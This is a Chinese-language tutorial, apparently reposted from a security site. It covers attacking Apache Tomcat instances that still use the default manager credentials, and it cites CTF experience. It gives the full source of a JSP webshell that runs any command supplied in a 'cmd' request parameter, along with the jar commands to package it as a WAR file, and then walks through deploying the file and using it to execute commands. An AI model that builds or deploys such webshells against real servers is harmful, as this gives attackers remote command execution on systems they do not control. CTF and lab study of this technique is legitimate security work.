加入收藏 | 设为首页 | 会员中心 | 我要投稿 新余站长网 (https://www.0790zz.com/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 站长资讯 > 外闻 > 正文

攻击Tomcat的多种姿势

发布时间:2019-02-21 11:47:48 所属栏目:外闻 来源:嘶吼专业版
导读:大家好,本文我想分享一下我的经验,如果你的Tomcat应用设置的是默认登陆凭证时(Tomcat:Tomcat)如何进行利用?当我在打CTF时,很多次我都发现目标主机上的Tomcat应用都是配置的默认登陆凭证,这有助于我们拿到主机的远程shell。因此,我感觉应该记录一下所

一旦执行了上述命令,我们就可以直接获得一个webshell了,如下图所示:

攻击Tomcat的多种姿势

生成JSP webshell

接下来,我们就来看看如何生成和部署webshell来获得Tomcat应用中的执行命令。

首先,我们需要写一个webshell并且打包成war格式。我们可以使用下面的代码来写一个webshell:

  1. <%@ page import="java.io.*" %> 
  2. <% 
  3.    String cmd = request.getParameter("cmd"); 
  4.    String output = ""; 
  5.    if(cmd != null) { 
  6.       String s = null; 
  7.       try { 
  8.          Process p = Runtime.getRuntime().exec(cmd,null,null); 
  9.          BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); 
  10.          while((s = sI.readLine()) != null) { output += s+" 
  11. "; } 
  12.       }  catch(IOException e) {   e.printStackTrace();   } 
  13.    } 
  14. %> 
  15. <%=output %> 

保存代码为index.jsp文件,然后使用下列命令来打包:

  1. mkdir webshell 
  2. cp index.jsp webshell/ 
  3. cd webshell 
  4. jar -cvf ../webshell.war * 

攻击Tomcat的多种姿势

执行完这条命令,你就能生成一个war文件,你可以将这个war文件部署在Tomcat应用中。

如下图所示,你可以看到,我已经成功上传并部署了webshell.war文件,现在我们点击这个文件来执行:

攻击Tomcat的多种姿势

在执行/webshell时,你会得到一个404错误页面,现在再执行webshell下的index.jsp文件,如下:

http://192.168.1.106:8080/webshell/index.jsp

访问了上述URL后,你会得到一个命令执行的表单,现在你就可以在这个表单上任意执行cmd命令了,如图:

攻击Tomcat的多种姿势

本文到此结束,希望大家有所收获。

(编辑:新余站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

热点阅读